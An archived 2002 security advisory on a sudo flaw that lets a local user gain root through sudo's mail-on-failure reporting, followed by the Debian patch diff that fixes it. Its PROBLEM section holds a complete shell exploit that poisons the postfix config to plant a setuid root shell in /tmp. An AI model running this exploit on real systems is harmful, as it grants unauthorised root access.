Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: unix4996.htm

sudo local exploit due to bad handling of error reports



15th Jan 2002 [SBWID-4996]
COMMAND

	sudo local exploit due to bad handling of error reports

SYSTEMS AFFECTED

	all sudo up to 1.6.3 ??

PROBLEM

	Sebastian Krahmer of the SuSE Security Team reported :
	

	If sudo is configured to send a mail when a failed attempt of  using  it
	happens, it does it with uid0 perms. This cumulated with the  fact  that
	the string passed to the mailer contained the  original  sudo  arguments
	unparsed, it is possible to break sendmail using \'\\0\' string in  your
	arguments, thus gaining root easily.
	

	Check the diff below for better clarification.
	

	Exploit =======
	

	Provided by Charles \'core\' Stevenson for Sudo&Postfix
	

	

	#!/bin/sh

	#

	# root shell exploit for postfix + sudo

	# tested on debian powerpc unstable

	#

	# by Charles \'core\' Stevenson <core@bokeoa.com>

	

	# Put your password here if you\'re not in the sudoers file

	PASSWORD=wdnownz

	

	echo -e \"sudo exploit by core <core@bokeoa.com>\\n\"

	

	echo \"Setting up postfix config directory...\"

	/bin/cp -r /etc/postfix /tmp

	

	echo \"Adding malicious debugger command...\"

	echo \"debugger_command = /bin/cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh\">>/tmp/postfix/main.cf

	

	echo \"Setting up environment...\"

	export MAIL_CONFIG=/tmp/postfix

	export MAIL_DEBUG=

	

	sleep 2

	

	echo \"Trying to exploit...\"

	echo -e \"$PASSWORD\\n\"|/usr/bin/sudo su -

	

	sleep 2

	

	echo \"We should have a root shell let\'s check...\"

	ls -l /tmp/sh

	

	echo \"Cleaning up...\"

	rm -rf /tmp/postfix

	

	echo \"Attempting to run root shell...\"

	/tmp/sh

	

SOLUTION

	

	--- sudo-1.6.2p2.orig/debian/changelog

	+++ sudo-1.6.2p2/debian/changelog

	@@ -0,0 +1,309 @@

	+sudo (1.6.2p2-2.1) stable; urgency=high

	+

	+  * Non-maintainer upload by Security Team

	+  * sudo will not longer send mail as root if it detects abuse.  This is

	+    due to a bugfix which fixes root hole.  The user can potentially kill

	+    the sendmail process, though.  This is based on work by Sebastian

	+    Krahmer from SuSE.

	+

	+ -- Martin Schulze <joey@infodrom.org>  Sat, 12 Jan 2002 21:18:59 +0100

	+

	+sudo (1.6.2p2-2) stable; urgency=high

	+

	+  * fix for buffer overrun back-ported from 1.6.3p6

	+

	+ -- Bdale Garbee <bdale@gag.com>  Mon, 26 Feb 2001 11:23:13 -0700

	+

	+sudo (1.6.2p2-1) frozen unstable; urgency=medium

	+

	+  * new upstream source resulting from direct collaboration with the upstream

	+    author to fix ugly pam-related problems on Debian in 1.6.1 and later.

	+    Closes: #56129, #55978, #55979, #56550, #56772

	+  * include more upstream documentation, closes: #55054

	+  * pam.d fragment update, closes: #56129

	+

	+ -- Bdale Garbee <bdale@gag.com>  Sun, 27 Feb 2000 11:48:48 -0700

	+

	+sudo (1.6.1-1) unstable; urgency=low

	+

	+  * new upstream source, closes: #52750

	+

	+ -- Bdale Garbee <bdale@gag.com>  Fri,  7 Jan 2000 21:01:42 -0700

	+

	+sudo (1.6-2) unstable; urgency=low

	+

	+  * drop suidregister support for this package.  The sudo executable is 

	+    essentially worthless unless it is setuid root, and making suidregister

	+    work involves shipping a non-setuid executable in the .deb and setting the

	+    perms in the postinst.  On a long upgrade run, this can leave the sudo

	+    executable \'broken\' for a long time, which is unacceptable.  With this

	+    version, we ship the executable setuid root in the .deb.  Closes: #51742

	+

	+ -- Bdale Garbee <bdale@gag.com>  Wed,  1 Dec 1999 19:59:44 -0700

	+

	+sudo (1.6-1) unstable; urgency=low

	+

	+  * new upstream version, many options previously set at compile-time are now

	+    configurable at runtime.  

	+    Closes: #39255, #20996, #29812, #50705, #49148, #48435, #47190, #45639

	+  * FHS support

	+

	+ -- Bdale Garbee <bdale@gag.com>  Tue, 23 Nov 1999 16:51:22 -0700

	+

	+sudo (1.5.9p4-1) unstable; urgency=low

	+

	+  * new upstream version, closes: #43464

	+  * empty password handling was fixed in 1.5.8, closes: #31863

	+

	+ -- Bdale Garbee <bdale@gag.com>  Thu, 26 Aug 1999 00:00:57 -0600

	+

	+sudo (1.5.9p1-1) unstable; urgency=low

	+

	+  * new upstream version

	+

	+ -- Bdale Garbee <bdale@gag.com>  Thu, 15 Apr 1999 22:43:29 -0600

	+

	+sudo (1.5.8p1-1) unstable; urgency=medium

	+

	+  * new upstream version, closes 33690

	+  * add dependency on libpam-modules, closes 34215, 33432

	+

	+ -- Bdale Garbee <bdale@gag.com>  Mon,  8 Mar 1999 10:27:42 -0700

	+

	+sudo (1.5.7p4-2) unstable; urgency=medium

	+

	+  * update the pam fragment provided so that sudo works with latest pam bits,

	+    closes 33432

	+

	+ -- Bdale Garbee <bdale@gag.com>  Sun, 21 Feb 1999 00:22:44 -0700

	+

	+sudo (1.5.7p4-1) unstable; urgency=low

	+

	+  * new upstream release

	+

	+ -- Bdale Garbee <bdale@gag.com>  Sun, 27 Dec 1998 16:13:53 -0700               

	+

	+sudo (1.5.6p5-1) unstable; urgency=low

	+

	+  * new upstream patch release

	+  * add PAM support, closes 28594

	+

	+ -- Bdale Garbee <bdale@gag.com>  Mon,  2 Nov 1998 00:00:24 -0700               

	+

	+sudo (1.5.6p2-2) unstable; urgency=low

	+

	+  * update copyright file, closes 24136

	+  * review and close forwarded bugs believed fixed in this upstream version,

	+    closes 17606, 15786.

	+

	+ -- Bdale Garbee <bdale@gag.com>  Mon,  5 Oct 1998 22:30:43 -0600               

	+

	+sudo (1.5.6p2-1) unstable; urgency=low

	+

	+  * new upstream release

	+

	+ -- Bdale Garbee <bdale@gag.com>  Mon,  5 Oct 1998 22:30:43 -0600               

	+

	+sudo (1.5.4-4) frozen unstable; urgency=low

	+

	+  * update postinst to use groupadd, closes 21403

	+  * move the suidregister stuff earlier in postinst to ensure it always runs

	+

	+ -- Bdale Garbee <bdale@gag.com>  Sun, 19 Apr 1998 22:07:45 -0600               

	+

	+sudo (1.5.4-3) frozen unstable; urgency=low

	+

	+  * change /etc/sudoers from a conffile to being handled in postinst, 

	+    closes 18219

	+  * add suidmanager support, closes 15711

	+  * add \'-Wno-comment\' to quiet warnings from gcc upstream maintainer is

	+    unlikely to ever fix, and which just don\'t matter.  closes 17146

	+  * fix FSF address in copyright file, and submit exception for lintian

	+    warning about sudo being setuid root

	+

	+ -- Bdale Garbee <bdale@gag.com>  Thu,  9 Apr 1998 23:59:11 -0600               

	+

	+sudo (1.5.4-2) unstable; urgency=high

	+ 

	+  * patch from upstream author correcting/improving security fix

	+  

	+ -- Bdale Garbee <bdale@gag.com>  Tue, 13 Jan 1998 10:39:35 -0700               

	+

	+sudo (1.5.4-1) unstable; urgency=high

	+

	+  * new upstream version, includes a security fix

	+  * change default editor from /bin/ae to /usr/bin/editor

	+

	+ -- Bdale Garbee <bdale@gag.com>  Mon, 12 Jan 1998 23:36:41 -0700

	+

	+sudo (1.5.3-1) unstable; urgency=medium

	+

	+  * new upstream version, closes bug 15911.

	+  * rules file reworked to use debhelper

	+  * implement a really gross hack to force use of the sudo-provided 

	+    lsearch(), since the one in libc6 is broken!  This closes bugs

	+    12552, 12557, 14881, 15259, 15916.  

	+

	+ -- Bdale Garbee <bdale@gag.com>  Sat,  3 Jan 1998 20:39:23 -0700

	+

	+sudo (1.5.2-6) unstable; urgency=LOW

	+

	+  * don\'t install INSTALL in the doc directory, closes bug 13195.

	+

	+ -- Bdale Garbee <bdale@gag.com>  Sun, 21 Sep 1997 17:10:40 -0600

	+

	+sudo (1.5.2-5) unstable; urgency=LOW

	+

	+  * libc6

	+

	+ -- Bdale Garbee <bdale@gag.com>  Fri,  5 Sep 1997 00:06:22 -0600

	+

	+sudo (1.5.2-4) unstable; urgency=LOW

	+

	+  * change TIMEOUT (how long before you have to type your password again)

	+    to 15 mins, disable PASSWORD_TIMEOUT.  This makes building large Debian

	+    packages on slower machines much more tolerable.  Closes bug 9076.

	+  * touch debian/suid before debstd.  Closes bug 8709.

	+

	+ -- Bdale Garbee <bdale@gag.com>  Sat, 26 Apr 1997 00:48:01 -0600

	+

	+sudo (1.5.2-3) frozen unstable; urgency=LOW

	+

	+  * patch from upstream maintainer to close Bug 6828

	+  * add a debian/suid file to get debstd to leave my perl postinst alone

	+

	+ -- Bdale Garbee <bdale@gag.com>  Fri, 11 Apr 1997 23:09:55 -0600

	+

	+sudo (1.5.2-2) frozen unstable; urgency=LOW

	+

	+  * change rules to use -O2 -Wall as per standards

	+

	+ -- Bdale Garbee <bdale@gag.com>  Sun, 6 Apr 1997 12:48:53 -0600

	+

	+sudo (1.5.2-1) unstable; urgency=LOW

	+

	+  * new upstream version

	+  * cosmetic changes to debian package control files

	+

	+ -- Bdale Garbee <bdale@gag.com>  Wed, 30 Oct 1996 09:50:00 -0700

	+

	+sudo (1.5-2) unstable; urgency=LOW

	+

	+  * add /usr/X11R6/bin to the end of the secure path... this makes it

	+    much easier to run xmkmf, etc., during package builds.  To the extent

	+    that /usr/local/sbin and /usr/local/bin were already included, I see

	+    no security reasons not to add this.

	+

	+ -- Bdale Garbee <bdale@gag.com>  Wed, 30 Oct 1996 09:44:58 -0700

	+

	+sudo (1.5-1) unstable; urgency=LOW

	+

	+  * New upstream version

	+  * New maintainer

	+  * New packaging format

	+

	+ -- Bdale Garbee <bdale@gag.com>  Thu, 29 Aug 1996 11:44:22 +0200

	+

	+Tue Mar  5 09:36:41 MET 1996 Michael Meskes <meskes@informatik.rwth-aachen.de>

	+

	+        sudo (1.4.1-1):

	+

	+        * hard code SECURE_PATH to:

	+		\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"

	+

	+	* enable ENV_EDITOR

	+

	+	* enabled EXEMPTGROUP \"sudo\"

	+

	+	* moved timestamp dir to /var/log/sudo

	+

	+	* changed parser to check for long and short filenames (Bug#1162)

	+

	+Wed Apr 17 13:03:31 MET DST 1996 Michael Meskes <meskes@informatik.rwth-aachen.de>

	+

	+        sudo (1.4.2-1):

	+

	+	* New upstream source

	+

	+	* Fixed postinst script

	+		(thanks to Peter Tobis <tobias@et-inf.fho-emden.de>)

	+

	+	* Removed special shadow binary. This version works with and without

	+	  shadow password file.

	+

	+Mon May 20 09:35:22 MET DST 1996 Michael Meskes <meskes@debian.org>

	+

	+        sudo (1.4.2-2):

	+

	+	* Corrected editor path to /bin/ae (Bug#3062)

	+

	+	* Set file permission to 4755 for sudo and 755 for visudo (Bug#3063)

	+

	+Mon Jun 17 12:06:41 MET DST 1996 Michael Meskes <meskes@debian.org>

	+

	+        sudo (1.4.3-1):

	+

	+	* New upstream version

	+

	+	* Changed sudoers permission to 440 (owner root, group root) to make

	+	  sudo usable via NFS

	+

	+Wed Jun 19 10:56:54 MET DST 1996 Michael Meskes <meskes@debian.org>

	+

	+        sudo (1.4.3-2):

	+

	+	* Applied upstream patch 1

	+

	+Thu Jun 20 09:02:57 MET DST 1996 Michael Meskes <meskes@debian.org>

	+

	+        sudo (1.4.3-3):

	+

	+        * Applied upstream patch 2

	+

	+Fri Jun 28 12:49:40 MET DST 1996 Michael Meskes <meskes@debian.org>

	+

	+        sudo (1.4.3-4):

	+

	+        * Applied upstream patch 3 (fixes problems with an NFS-mounted

	+          sudoers file)

	+

	+

	+Sun Jun 30 13:02:44 MET DST 1996 Michael Meskes <meskes@debian.org>

	+

	+        sudo (1.4.3-5):

	+

	+	* Corrected postinst to use /usr/bin/perl instead of /bin/perl

	+	  [Reported by jdassen@wi.leidenuniv.nl (J.H.M.Dassen)]

	+

	+Wed Jul 10 12:44:33 MET DST 1996 Michael Meskes <meskes@debian.org>

	+

	+        sudo (1.4.3-6):

	+

	+	* Applied upstream patch 4 (fixes several bugs)

	+

	+	* Changed priority to optional

	+

	+Thu Jul 11 19:23:52 MET DST 1996 Michael Meskes <meskes@debian.org>

	+

	+        sudo (1.4.3-7):

	+

	+	* Corrected postinst to create correct permission for /etc/sudoers

	+	  (Bug#3749)

	+

	+Fri Aug  2 10:50:53 MET DST 1996 Michael Meskes <meskes@debian.org>

	+

	+        sudo (1.4.4-1):

	+

	+	* New upstream version

	+

	+

	+sudo (1.4.4-2) admin; urgency=HIGH

	+

	+	* Fixed major security bug reported by Peter Tobias

	+	  <tobias@et-inf.fho-emden.de>

	+	* Added dchanges support to debian.rules

	+

	+sudo (1.4.5-1) admin; urgency=LOW

	+

	+	* New upstream version

	+	* Minor changes to debian.rules

	--- sudo-1.6.2p2.orig/debian/OPTIONS

	+++ sudo-1.6.2p2/debian/OPTIONS

	@@ -0,0 +1,39 @@

	+The following options were used to configure sudo for Debian GNU/Linux.

	+

	+  --with-exempt=sudo 

	+

	+	Any user in group \'sudo\' will not need to type their password.  It

	+	is strongly recommended that no users be put in group sudo, and that

	+	instead the NOPASSWD option in the sudoers file be used if desired.

	+

	+  --with-pam 

	+	

	+	Support for pluggable authentication modules.

	+

	+  --with-fqdn 

	+

	+	Allow use of fully qualified domain names in the sudoers file.

	+

	+  --with-logging=syslog

	+  --with-logfac=authpriv 

	+

	+	Where logging information goes.

	+

	+  --with-env-editor 

	+  --with-editor=/usr/bin/editor 

	+

	+	Honor the EDITOR and VISUAL environment variables.  If they are not

	+	present, default to the Debian default system editor.

	+

	+  --with-timeout=15 

	+  --with-password-timeout=0 

	+

	+	Allow 15 minutes before a user has to re-type their passord, versus

	+	the sudo usual default of 5.  Never time out while waiting for a

	+	password to be typed, this is a seriously big deal for Debian package

	+	developers using \'dpkg-buildpackage -rsudo\'.

	+

	+  --with-secure-path=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:\\

	+	/sbin:/bin:/usr/X11R6/bin\"  

	+

	+	Give a reasonable default path for commands run as root via sudo.

	--- sudo-1.6.2p2.orig/debian/conffiles

	+++ sudo-1.6.2p2/debian/conffiles

	@@ -0,0 +1 @@

	+/etc/pam.d/sudo

	--- sudo-1.6.2p2.orig/debian/control

	+++ sudo-1.6.2p2/debian/control

	@@ -0,0 +1,15 @@

	+Source: sudo

	+Section: admin

	+Priority: optional

	+Maintainer: Bdale Garbee <bdale@gag.com>

	+Build-Depends: debhelper, libpam0g-dev

	+Standards-Version: 3.1.1.1

	+

	+Package: sudo

	+Architecture: any

	+Depends: ${shlibs:Depends}, libpam-modules

	+Description: Provides limited super user privileges to specific users.

	+ Sudo is a program designed to allow a sysadmin to give limited root

	+ privileges to users and log root activity.  The basic philosophy is to give

	+ as few privileges as possible but still allow people to get their work done.

	+

	--- sudo-1.6.2p2.orig/debian/copyright

	+++ sudo-1.6.2p2/debian/copyright

	@@ -0,0 +1,75 @@

	+This is the Debian GNU/Linux prepackaged version of sudo.  sudo is

	+used to provide limited super user privileges to specific users.

	+

	+This package was put together by Bdale Garbee <bdale@gag.com> using sources

	+from 

	+	ftp://ftp.cs.colorado.edu/pub/sudo/

	+

	+Sudo is distributed under the following BSD-style license:

	+

	+/*

	+ * Copyright (c) 1994-1996,1998-1999 Todd C. Miller <Todd.Miller@courtesan.com>

	+ * All rights reserved.

	+ *

	+ * Redistribution and use in source and binary forms, with or without

	+ * modification, are permitted provided that the following conditions

	+ * are met:

	+ *

	+ * 1. Redistributions of source code must retain the above copyright

	+ *    notice, this list of conditions and the following disclaimer.

	+ *

	+ * 2. Redistributions in binary form must reproduce the above copyright

	+ *    notice, this list of conditions and the following disclaimer in the

	+ *    documentation and/or other materials provided with the distribution.

	+ *

	+ * 3. The name of the author may not be used to endorse or promote products

	+ *    derived from this software without specific prior written permission

	+ *    from the author.

	+ *

	+ * 4. Products derived from this software may not be called \"Sudo\" nor

	+ *    may \"Sudo\" appear in their names without specific prior written

	+ *    permission from the author.

	+ *

	+ * THIS SOFTWARE IS PROVIDED ``AS IS\'\' AND ANY EXPRESS OR IMPLIED WARRANTIES,

	+ * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY

	+ * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL

	+ * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,

	+ * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,

	+ * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;

	+ * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,

	+ * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR

	+ * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF

	+ * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

	+ */

	+

	+Additionally, lsearch.c, fnmatch.c, getcwd.c, snprintf.c, strcasecmp.c

	+and fnmatch.3 bear the following UCB license:

	+

	+/*

	+ * Copyright (c) 1987, 1989, 1990, 1991, 1993, 1994

	+ *	The Regents of the University of California.  All rights reserved.

	+ *

	+ * Redistribution and use in source and binary forms, with or without

	+ * modification, are permitted provided that the following conditions

	+ * are met:

	+ * 1. Redistributions of source code must retain the above copyright

	+ *    notice, this list of conditions and the following disclaimer.

	+ * 2. Redistributions in binary form must reproduce the above copyright

	+ *    notice, this list of conditions and the following disclaimer in the

	+ *    documentation and/or other materials provided with the distribution.

	+ * 3. Neither the name of the University nor the names of its contributors

	+ *    may be used to endorse or promote products derived from this software

	+ *    without specific prior written permission.

	+ *

	+ * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS\'\' AND

	+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE

	+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE

	+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE

	+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL

	+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS

	+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)

	+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT

	+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY

	+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF

	+ * SUCH DAMAGE.

	+ */

	--- sudo-1.6.2p2.orig/debian/dirs

	+++ sudo-1.6.2p2/debian/dirs

	@@ -0,0 +1,6 @@

	+etc/pam.d

	+usr/bin

	+usr/share/man/man8

	+usr/share/man/man5

	+usr/sbin

	+usr/share/doc/sudo/examples

	--- sudo-1.6.2p2.orig/debian/postinst

	+++ sudo-1.6.2p2/debian/postinst

	@@ -0,0 +1,68 @@

	+#!/usr/bin/perl

	+

	+# remove old link

	+

	+unlink (\"/etc/alternatives/sudo\") if ( -l \"/etc/alternatives/sudo\");

	+

	+# make sure we have a sudoers file

	+if ( ! -f \"/etc/sudoers\") {

	+

	+	print \"No /etc/sudoers found... creating one for you.\\n\";

	+

	+	open (SUDOERS, \"> /etc/sudoers\");

	+	print SUDOERS \"# sudoers file.\\n\",

	+	  \"#\\n\",

	+	  \"# This file MUST be edited with the \'visudo\' command as root.\\n\",

	+	  \"#\\n\",

	+	  \"# See the man page for details on how to write a sudoers file.\\n\",

	+	  \"#\\n\\n# Host alias specification\\n\\n\",

	+	  \"# User alias specification\\n\\n\",

	+	  \"# Cmnd alias specification\\n\\n\",

	+	  \"# User privilege specification\\nroot\\tALL=(ALL) ALL\\n\";

	+	close SUDOERS;

	+

	+}

	+

	+# make sure sudoers has the correct permissions and owner/group

	+system (\'chown root.root /etc/sudoers\');

	+system (\'chmod 440 /etc/sudoers\');

	+

	+if ( -e \"/etc/suid.conf\" && -x \"/usr/sbin/suidregister\" ) {

	+        system (\'suidregister -s sudo /usr/bin/sudo root root 4755\');

	+} else {

	+        system (\'chown root.root /usr/bin/sudo\');

	+        system (\'chmod 4755 /usr/bin/sudo\');

	+}

	+

	+if ( $ARGV[0] == \"configure\" && -d \"/usr/doc\" && ! -e \"/usr/doc/sudo\" && 

	+		-d \"/usr/share/doc/sudo\" ) {

	+	system (\'ln -sf ../share/doc/sudo /usr/doc/sudo\');

	+}

	+

	+# make sure we have a sudo group

	+

	+exit 0 if getgrnam(\"sudo\"); # we\'re finished if there is a group sudo

	+

	+$gid = 27;                 # start searcg with gid 27

	+setgrent;

	+while (getgrgid($gid)) {

	+	++$gid;

	+}

	+endgrent;

	+

	+if ($gid != 27) {

	+	print \"On Debian we normally use gid 27 for \'sudo\'.\\n\";

	+	$gname = getgrgid(27);

	+	print \"However, on your system gid 27 is group \'$gname\'.\\n\\n\";

	+	print \"Would you like me to stop configuring sudo so that you can change this? [n] \"; 

	+	$ans = <STDIN>;

	+        if ($ans =~ m/^[yY].*/) {

	+		print \"\'dpkg --pending --configure\' will restart the configuration.\\n\\n\\n\";

	+		exit 1;

	+	}

	+}

	+

	+print \"Creating group \'sudo\' with gid = $gid\\n\";

	+system(\"groupadd -g $gid sudo\");

	+

	+print \"\";

	--- sudo-1.6.2p2.orig/debian/postrm

	+++ sudo-1.6.2p2/debian/postrm

	@@ -0,0 +1,6 @@

	+#!/usr/bin/perl

	+

	+if ( -e \"/etc/suid.conf\" && -x \"/usr/sbin/suidregister\" ) {

	+        system (\'suidunregister -s sudo /usr/bin/sudo\');

	+}

	+

	--- sudo-1.6.2p2.orig/debian/rules

	+++ sudo-1.6.2p2/debian/rules

	@@ -0,0 +1,68 @@

	+#!/usr/bin/make -f

	+

	+# Uncomment this to turn on verbose mode.

	+#export DH_VERBOSE=1

	+

	+build: build-stamp

	+build-stamp:

	+

	+	CFLAGS=\"-g -O2 -Wall -Wno-comment\" ./configure --prefix=/usr -v \\

	+		--with-exempt=sudo --with-pam --with-fqdn \\

	+		--with-logging=syslog --with-logfac=authpriv \\

	+		--with-env-editor --with-editor=/usr/bin/editor \\

	+		--with-timeout=15 --with-password-timeout=0 \\

	+		--with-secure-path=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin\" 

	+

	+#	# start ugly, ugly hack until libc6\'s \'lsearch()\' gets fixed...

	+#	sed -e \'/LSEARCH/s/define/undef/g\' < config.h > config.h.new

	+#	mv config.h.new config.h

	+#	sed -e \'/^LIBOBJS/s/=/=lsearch.o/g\' < Makefile > Makefile.new

	+#	mv Makefile.new Makefile

	+#	# end ugly, ugly hack

	+

	+	make

	+	touch build-stamp

	+

	+clean:

	+	dh_testdir

	+	dh_testroot

	+	rm -f build-stamp config.cache config.log

	+	dh_clean

	+	make distclean || exit 0

	+

	+binary-indep:	build

	+

	+binary-arch:	build

	+	dh_testdir

	+	dh_testroot

	+	dh_clean

	+	dh_installdirs

	+	install -o root -g root -m 4755 -s sudo debian/tmp/usr/bin/sudo

	+	install -o root -g root -m 0755 -s visudo debian/tmp/usr/sbin/visudo

	+	install -o root -g root -m 0644 sudo.man \\

	+		debian/tmp/usr/share/man/man8/sudo.8 

	+	install -o root -g root -m 0644 visudo.man \\

	+		debian/tmp/usr/share/man/man8/visudo.8 

	+	install -o root -g root -m 0644 sudoers.man \\

	+		debian/tmp/usr/share/man/man5/sudoers.5 

	+	install -g root -m 644 -o root sample.sudoers \\

	+		debian/tmp/usr/share/doc/sudo/examples/sudoers

	+	install -g root -m 644 -o root debian/sudo.pam \\

	+		debian/tmp/etc/pam.d/sudo

	+	dh_installdocs debian/OPTIONS BUGS RUNSON UPGRADE PORTING \\

	+		TODO HISTORY README TROUBLESHOOTING

	+	dh_installchangelogs CHANGES

	+	dh_strip

	+	dh_compress

	+	dh_installdeb

	+	dh_shlibdeps

	+	dh_gencontrol

	+	dh_md5sums

	+	dh_builddeb

	+

	+source diff:                                                                  

	+	@echo >&2 \'source and diff are obsolete - use dpkg-source -b\'; false

	+

	+binary: binary-indep binary-arch

	+.PHONY: build clean binary-indep binary-arch binary

	+

	--- sudo-1.6.2p2.orig/debian/sudo.pam

	+++ sudo-1.6.2p2/debian/sudo.pam

	@@ -0,0 +1,3 @@

	+#%PAM-1.0

	+

	+auth	required	pam_unix.so 

	--- sudo-1.6.2p2.orig/CHANGES

	+++ sudo-1.6.2p2/CHANGES

	@@ -1252,3 +1252,8 @@

	 

	 395) Fixed a bug that caused an infinite loop when the password

	      timeout was disabled.

	+

	+396) sudo will not longer send mail as root if it detects abuse.  This

	+     is due to a bugfix which fixes root hole.  The user can

	+     potentially kill the sendmail process, though.  This is based on

	+     work by Sebastian Krahmer from SuSE.

	--- sudo-1.6.2p2.orig/logging.c

	+++ sudo-1.6.2p2/logging.c

	@@ -112,7 +112,8 @@

	     /*

	      * Log the full line, breaking into multiple syslog(3) calls if necessary

	      */

	-    for (p = msg, count = 0; count < strlen(msg) / MAXSYSLOGLEN + 1; count++) {

	+    for (p = msg, count = 0; *p && count < strlen(msg) / MAXSYSLOGLEN + 1; 

	+	count++) {

	 	if (strlen(p) > MAXSYSLOGLEN) {

	 	    /*

	 	     * Break up the line into what will fit on one syslog(3) line

	@@ -135,7 +136,7 @@

	 	    *tmp = save;			/* restore saved character */

	 

	 	    /* Eliminate leading whitespace */

	-	    for (p = tmp; *p != \' \'; p++)

	+	    for (p = tmp; *p != \' \' && *p !=\'\\0\'; p++)

	 		;

	 	} else {

	 	    if (count == 0)

	@@ -456,8 +457,8 @@

	 		    }

	 		    argv[i] = NULL;

	 

	-		    /* Run mailer as root so user cannot kill it. */

	-		    set_perms(PERM_ROOT, 0);

	+		    /* Running as root is bad.  Start sendmail as user */

	+		    set_perms(PERM_FULL_USER, 0);

	 		    execv(mpath, argv);

	 		    _exit(127);

	 		}

	--- sudo-1.6.2p2.orig/version.h

	+++ sudo-1.6.2p2/version.h

	@@ -37,6 +37,6 @@

	 #ifndef _SUDO_VERSION_H

	 #define _SUDO_VERSION_H

	 

	-static const char version[] = \"1.6.2p2\";

	+static const char version[] = \"1.6.2p2+\";

	 

	#endif /* _SUDO_VERSION_H */

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH